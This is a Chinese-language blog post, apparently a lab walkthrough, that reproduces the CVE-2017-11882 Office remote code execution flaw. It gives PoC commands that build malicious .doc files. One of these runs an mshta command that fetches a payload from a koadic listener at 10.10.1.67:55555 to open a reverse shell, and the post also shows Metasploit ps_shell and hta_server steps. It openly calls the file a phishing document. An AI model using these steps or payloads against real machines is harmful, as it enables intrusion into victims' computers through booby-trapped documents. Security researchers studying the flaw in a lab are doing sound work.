CVE-2017-11882(Office远程代码执行)

测试环境:win7+kali+office 2007 xp+kali+office 2003
win7 ip:10.10.1.144 xp ip: 10.10.1.126 kali ip 10.10.1.67

一. 简单测试弹出计算器(xp)

1.在kali下执行生成一个含有恶意代码的doc进行测试:
PythonCommand109b_CVE-2017-11882 -c “cmd.exe /c calc.exe” -o test.doc

这条指令的意思是调用cmd并执行calc.exe(即计算器)
在这里插入图片描述

2.在靶机上打开就会弹出计算器:

在这里插入图片描述

二. 通过koadic漏洞复现(xp)

1.下载koadic并启用

https://github.com/backlion/koadic.git

2.执行./koadice

在这里插入图片描述
首先看一下koadic怎么用直接
在这里插入图片描述

3.接下来设置shell的接受地址以及端口
Set lhost 10.10.1.67
Set lport 55555
Run

在这里插入图片描述
这儿需要注意的是生成的网址需要记住,以方便后面应用
接下来通过poc生成一个含有恶意代码的doc文件

python Command109b_CVE-2017-11882.py -c “mshtahttp://10.10.1.67:55555/Ly348” -o exploit.doc

在这里插入图片描述
接下来在目标主机打开钓鱼文档
切回koadic则发现发生变化
在这里插入图片描述
这个时候说明入侵成功并已经反弹shell
接下来在koadic执行zombies 0 切换到项目
在这里插入图片描述
接下来用cmdshell模块
输入 cmdshell 0
在这里插入图片描述
这就已经进去cmd了接下来可以愉快的玩耍了
在这里插入图片描述
在这里插入图片描述

三. 通过msf的ps_shell模块 漏洞复现(win7)

1.启动msfconsole

在这里插入图片描述

2.查找对应的模块 search PS_shell

在这里插入图片描述
在这里插入图片描述

3.利用msf生成利用的powershell脚本

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
提示一点 在这儿的Command109b_CVE-2017-11882是109字节限制的 当然也有43字节的
1.接接下来在靶机打开测试文档就好
2.切换回kali 会出现
在这里插入图片描述
说明已经建立链接了
接下来输入sessions -i 查看一下
在这里插入图片描述
接下来切换进入
在这里插入图片描述
这个时候就已经入侵到靶机了。
在这里插入图片描述

四. 通过hta_server模块复现(xin7)

1.在msf搜索hta_server模块

在这里插入图片描述

2.进行设置

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

3.在kali上生成带有恶意命令的doc

在这里插入图片描述

4.在靶机上打开test.doc文档 切换回kal

在这里插入图片描述

在这里插入图片描述
(之后的过程就和之前一样了,就不多啰嗦了)。
(ps:后两种是利用了powershell,所以在win7下测试的)

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值